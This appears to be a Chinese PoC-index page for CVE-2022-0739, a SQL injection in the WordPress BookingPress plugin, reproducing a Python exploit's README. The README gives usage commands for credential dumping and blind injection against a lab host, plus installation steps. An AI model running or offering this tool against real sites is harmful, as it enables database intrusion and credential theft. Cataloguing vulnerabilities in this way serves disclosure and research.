关联漏洞
标题:
WordPress plugin BookingPress SQL注入漏洞
(CVE-2022-0739)
描述:WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是WordPress开源的一个应用插件。 WordPress plugin BookingPress 1.0.11 版本之前存在SQL注入漏洞,该漏洞源于通过 AJAX 请求 bookingpress_front_get_category_services 函数操作用于动态构建的 SQL 查询之前,没有正确清理用户提供的 POST 数据。
描述
🐍 Python Exploit for CVE-2022-0739
介绍
# CVE-2022-0739
Python PoC Exploit for [CVE-2022-0739](https://nvd.nist.gov/vuln/detail/CVE-2022-0739)
## Features
* Database Metadata Lookup
* Wordpress User Credential Dump
* Arbitrary Blind Query Injection 💉
## Usage
```bash
usage: cve-2022-0739 [-h] -u URL [-e EXEC]
options:
-h, --help show this help message and exit
-u URL, --url URL URL of the page containing the BookingPress Widget
-e EXEC, --exec EXEC Optional query for Blind SQL Injection
```
### Information Leak
```bash
cve-2022-0739 --url http://metapress.htb/event
```
### Blind Injection
```bash
cve-2022-0739 --url http://metapress.htb/event --exec "SELECT SLEEP(5)"
```
## Installation
### PyPI
```bash
python3 -m pip install cve-2022-0739
```
### Manual
```bash
python3 -m pip install cve_2022_0739-1.0.0-py3-none-any.whl
```
[Download Latest Release](https://github.com/BKreisel/CVE-2022-0739/releases/download/1.0.0/cve_2022_0739-1.0.0-py3-none-any.whl)
## Demo
### Information Leak
[](https://asciinema.org/a/544403?autoplay=1)
### Blind Injection
[](https://asciinema.org/a/544404?autoplay=1)
文件快照
[4.0K] /data/pocs/03bd860a98ba7dc5579e96a1610a2482db8886b8
├── [1.0K] LICENSE
├── [ 709] pyproject.toml
├── [1.2K] README.md
└── [4.0K] src
└── [4.0K] cve_2022_0739
├── [ 0] __init__.py
└── [9.0K] main.py
2 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。